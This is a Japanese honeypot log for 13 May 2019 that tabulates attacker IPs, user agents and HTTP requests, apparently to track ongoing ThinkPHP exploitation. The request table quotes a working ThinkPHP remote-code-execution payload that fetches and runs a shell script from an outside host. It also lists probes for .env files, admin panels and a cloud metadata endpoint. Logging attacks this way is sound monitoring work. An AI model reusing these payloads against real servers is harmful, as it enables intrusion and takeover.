ハニーポット(仮) 観測記録
2019/05/13分です。
アクセス数としては落ち着いた1日でしたが
ThinkPHPの脆弱性狙いのアクセスは継続しています。
総アクセス数:44 (前日比:-764)
都合により
GET / HTTP/1.1
POST / HTTP/1.1
は除いています。
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 103.35.74.82 | Hong Kong |
10 | 150.95.181.117 | Japan |
1 | 182.92.240.15 | China |
1 | 185.101.33.134 | Norway |
1 | 197.232.1.182 | Kenya |
3 | 216.144.240.130 | United States |
5 | 3.0.244.68 | Singapore |
1 | 39.108.245.137 | China |
2 | 4.34.201.34 | United States |
1 | 46.246.40.152 | Sweden |
3 | 5.188.210.101 | Russia |
1 | 61.219.11.153 | Taiwan |
3 | 71.243.234.3 | United States |
10 | 78.187.209.75 | Turkey |
1 | 78.232.233.42 | France |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
3 | curl/7.29.0 |
2 | Go-http-client/1.1 |
1 | masscan/1.0 (https://github.com/robertdavidgraham/masscan) |
1 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
3 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | - | - |
5 | CONNECT | antei.xyz:443 | HTTP/1.1 |
1 | GET | /admin.php | HTTP/1.1 |
2 | GET | /echo.php | HTTP/1.1 |
2 | GET | /elrekt.php | HTTP/1.1 |
3 | GET | /.env | HTTP/1.1 |
2 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://169[.]254[.]169[.]254/latest/meta-data | HTTP/1.1 |
1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
2 | GET | /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81[.]6[.]42[.]123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; | HTTP/1.1 |
3 | GET | /manager/html | HTTP/1.1 |
1 | GET | /phpmyadmin | HTTP/1.1 |
2 | GET | /public/index.php | HTTP/1.1 |
2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /v1/agent/self | HTTP/1.1\n |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | HEAD | /robots.txt | HTTP/1.1 |
2 | POST | /index.php?s=captcha | HTTP/1.1 |